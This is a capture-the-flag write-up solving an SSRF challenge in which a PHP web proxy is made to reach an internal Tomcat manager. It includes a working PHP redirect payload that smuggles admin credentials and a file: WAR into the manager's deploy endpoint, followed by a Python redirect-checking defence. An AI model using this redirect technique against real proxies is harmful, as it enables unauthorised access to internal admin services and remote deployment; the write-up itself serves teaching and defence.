CTF Challenge Description:

The challenge contains a PHP web proxy and a Tomcat server which has the Tomcat manager app deployed and was only accessible via the PHP web proxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxy container, and it has a few open issues, including some that look like they could be security-relevant.

Solution

To reach the Tomcat container through the proxy, simply enter 127.0.0.1:8888 and the Tomcat landing page is displayed. Tomcat mentions that an admin interface should be at /manager/html, but visiting 127.0.0.1:8888/manager/html through the proxy gives a “401 Unauthorized” error.

We also find the username and password (in manager-web.xml) and learn that /manager/text exists as an interface intended for scripts.

We can use /manager/text/deploy to deploy the folder that contains the flag and then visit it like any other web page.


Then we host the following PHP page on our local attacker machine. The server address can be:

http://127.0.0.1:8000/test

<?php
// Redirect the proxy to the Tomcat manager text interface; the basic-auth
// credentials travel in the URL's userinfo part and the proxy follows the redirect.
header('Location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}
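The proxy followed our redirect straight to a loopback URL that carried credentials and then deployed a file: URL. As an added example (not code from the write-up or from php-proxy-app), here is a Python check that a fetching proxy could apply to the initial URL and to every redirect hop; the public attacker address, the sample redirect chain, the war placeholder and the `resolve` callback are all constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Address ranges a user-facing proxy should never fetch on a user's behalf.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]


def check_target(url, resolve=lambda host: [host]):
    """Return None if url may be fetched, else the reason it is rejected.
    resolve(host) must return the IP addresses the fetch will actually connect to
    (here a stub that treats host as a literal IP); in production resolve once
    and connect to the returned address so DNS rebinding cannot bypass the check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):           # blocks file:, gopher:, ...
        return f"scheme not allowed: {parts.scheme}"
    if parts.username is not None or parts.password is not None:
        return "credentials embedded in URL"            # user@host smuggles basic auth
    host = parts.hostname
    if not host:
        return "missing host"
    for addr in resolve(host):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return f"unresolvable host: {host}"
        if any(ip in net for net in BLOCKED_NETS):
            return f"internal address: {addr}"
    return None


def follow_redirects(start_url, responses, max_hops=5):
    """Walk a redirect chain, re-checking every hop (a redirect is a new target).
    responses maps a URL to the Location it answers with (absent = final page).
    Returns (final_url, None) on success or (offending_url, reason) on rejection."""
    url = start_url
    for _ in range(max_hops + 1):
        reason = check_target(url)
        if reason:
            return url, reason
        nxt = responses.get(url)
        if nxt is None:
            return url, None
        url = nxt
    return url, "too many redirects"


# Constructed sample: the write-up's redirect, served from a public placeholder host.
SAMPLE_RESPONSES = {
    "http://203.0.113.10:8000/test":
    "http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/WAR_PLACEHOLDER",
}
```

Rejecting userinfo and loopback targets on every hop stops both the redirect trick and the direct 127.0.0.1:8888 browsing that started the chain.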


About the author

I create cyber security notes, digital marketing notes and online courses. I also offer digital marketing consulting, including but not limited to SEO, Google and Meta ads, and CRM management.
